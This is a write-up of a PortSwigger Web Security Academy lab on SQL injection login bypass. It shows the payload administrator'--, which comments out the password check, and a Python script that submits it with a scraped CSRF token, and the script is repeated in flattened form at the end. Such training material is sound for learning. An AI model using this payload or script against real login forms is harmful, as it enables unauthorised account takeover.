Allowing login bypass

Lab #2 by PortSwigger Web Security Academy:

Description

This lab contains a SQL injection vulnerability in the login function.

To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

Steps

Trying to login by using a single quote (') as the username, returns an internal server error, demonstrating that the app is vulnerable.

By intercepting the Login POST request and appending '-- to the administrator username, we can bypass the remaining part of the query that checks the password.

And we’re in!

Let’s script the solution in Python.

It’s a POST request that expects three parameters: csrf, username, and password.

import requests  
import sys  
import urllib3  
from bs4 import BeautifulSoup  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}  
  
def get_csrf_token(session, url):  
	response = session.get(url, verify=False, proxies=proxies)  
	soup = BeautifulSoup(response.text, 'html.parser')  
	# getting csrf from html input element  
	return soup.find("input")['value']  
  
  
if __name__ == "__main__":  
	try:  
		url = sys.argv[1].strip()  
		username = sys.argv[2].strip()  
	except IndexError:  
		print('Usage: %s <url> <username>, e.g www.example.com "1=1"' % sys.argv[0]) 
		sys.exit(-1)  
  
session = requests.Session()  
  
#password is not important knowing that Auth is bypassed from an SQLi in ther username parameter  
data = {"csrf": get_csrf_token(session, url), "username": username, "password": "randomstring"}  
response = session.post(url, data=data, verify=False, proxies=proxies)  
  
# Congratulations message will show up only after solving the lab manually.  
if "Congratulations" in response.text:  
	print("it worked.")  
else:  
	print("Didn't work.")

Testing the Python script:

> python3 sqli-lab02.py "https://0ab000eb0409a6428036c6eb00f500b7.web-security-academy.net/login" "administrator'--"

It worked! We can also validate it through Burp.

PreviousWHERE clause allowing retrieval of hidden data NextUNION attack, determining the number of columns returned by the query

Last updated 11 months ago

import requests import sys import urllib3 from bs4 import BeautifulSoup urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} def get_csrf_token(session, url): response = session.get(url, verify=False, proxies=proxies) soup = BeautifulSoup(response.text, 'html.parser') # getting csrf from html input element return soup.find("input")['value'] if __name__ == "__main__": try: url = sys.argv[1].strip() username = sys.argv[2].strip() except IndexError: print('Usage: %s <url> <username>, e.g www.example.com "1=1"' % sys.argv[0]) sys.exit(-1) session = requests.Session() #password is not important knowing that Auth is bypassed from an SQLi in ther username parameter data = {"csrf": get_csrf_token(session, url), "username": username, "password": "randomstring"} response = session.post(url, data=data, verify=False, proxies=proxies) # Congratulations message will show up only after solving the lab manually. if "Congratulations" in response.text: print("it worked.") else: print("Didn't work.")